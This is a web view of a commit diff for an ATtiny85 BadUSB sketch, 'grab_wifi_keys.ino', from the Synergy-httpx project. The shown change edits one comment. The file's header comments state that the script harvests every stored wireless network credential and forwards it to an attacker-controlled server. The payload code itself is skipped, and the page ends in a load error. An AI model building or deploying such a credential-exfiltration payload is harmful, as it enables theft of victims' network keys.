Projects STRLCPY Synergy-httpx Commits 365e80c8
🤬
  • ■ ■ ■ ■
    ATtiny85_templates/grab_wifi_keys.ino
    1 1  //This script grabs all stored wireless network credentials and forwards them via http(s)
    2 2  //to an attacker controlled server (created to work best with Synergy-Httpx as the receiver).
    3  -//I used a template from https://github.com/CedArctic/DigiSpark-Scripts/ to make this.
     3 +//I edited a template from https://github.com/CedArctic/DigiSpark-Scripts/ to make this.
    4 4   
    5 5  #include "DigiKeyboard.h"
    6 6  void setup() {
    skipped 17 lines
Please wait...
Page is in error, reload to recover